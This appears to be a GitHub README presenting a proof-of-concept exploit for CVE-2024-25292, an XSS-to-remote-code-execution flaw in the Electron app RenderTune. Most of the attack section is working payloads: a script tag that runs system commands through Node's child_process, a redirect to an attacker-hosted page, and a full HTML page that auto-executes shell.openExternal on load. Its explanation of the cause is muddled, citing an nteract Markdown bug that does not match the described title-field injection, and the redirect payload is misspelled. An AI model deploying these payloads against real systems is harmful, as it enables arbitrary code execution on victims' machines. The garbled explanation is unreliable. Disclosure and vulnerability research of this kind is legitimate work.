# RenderTune RCE

A Proof-Of-Concept for CVE-2024-25292 vulnerability. <br><br>
A cross-site scripting (XSS) vulnerability in RenderTune v1.1.4 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Upload Title parameter.
In this repository there is an example vulnerable application and proof-of-concept (POC) exploit of it.

As a PoC there is a python file that automates the process. 
---------------------------------------

#### 1.Vunerability Overview:
It is a vulnerability that enables RCE through XSS.
There is an XSS capable part of the title, so it is a vulnerability that enables RCE through the syntax of NodeJS through the syntax of XSS.

---------------------------------------

#### 2. Vulnerability Cause:
* nteract 0.28.0 allows Electron webview via Markdown link, with resultant remote code execution (because nodeIntegration in webPreferences is true).
* Exploit explain
  * When generating links through MarkDown within the application, it creates a WebView via Electron, allowing external access to the link. Consequently, an attacker can achieve Remote Code Execution (RCE) by connecting to the link leading to the attacker's server.

Proof-of-concept (POC)
----------------------
###  Case 1) XSS to RCE.
Step 1) Confirm that XSS occurs in the title part
※ At this time, the Upload item will not be registered unless the image is attached
```html
<b>jruru</b>
```
![1](https://github.com/user-attachments/assets/cac4cb64-4b6a-4c88-ac71-9f3723973ecd)




Step 2) Therefore, it is configured to use XSS to execute NodeJS system commands.
```html
<script>require('child_process').exec('C:/Windows/System32/calc.exe')</script>
```
![2](https://github.com/user-attachments/assets/dd128964-d194-4feb-a768-b309d1f65840)



### Case 2) Attacks through an attacker server
※ When you attempt an attack using window.location, you automatically go to the page you set each time you run the app.
```html
<script>window.loaction='http://[attacker IP]/[PoC.html]'</script>
```
**Note:** ※ If you want to test it quickly, create a server on the attacker's PC with the following code.
``` bash
$ python -m http.server 80
```

* PoC Code
```html
<html>
<head>
  <title>jruru Link</title>
</head>
<body>

  <!-- Run scripts using on-click properties directly to the tag -->
  <a id="jruruLink" href="#" onclick="openExternal()">jruru Link</a>

  <script>
    // Script function definition
    function openExternal() {
      try {
        const { shell } = require('electron');
        shell.openExternal('file:C:/Windows/System32/calc.exe');
      } catch(e) {
        alert('JRURU');
        alert(e);
      }
    }

    // Run script automatically when loading pages
    document.addEventListener('DOMContentLoaded', function() {
      openExternal();
    });
  </script>
</body>
</html>
```
![renderTune3](https://github.com/QnA4u/CVE/assets/131337101/a2d26c2e-4004-45d2-8b63-36702087f597)

---------------------------------------

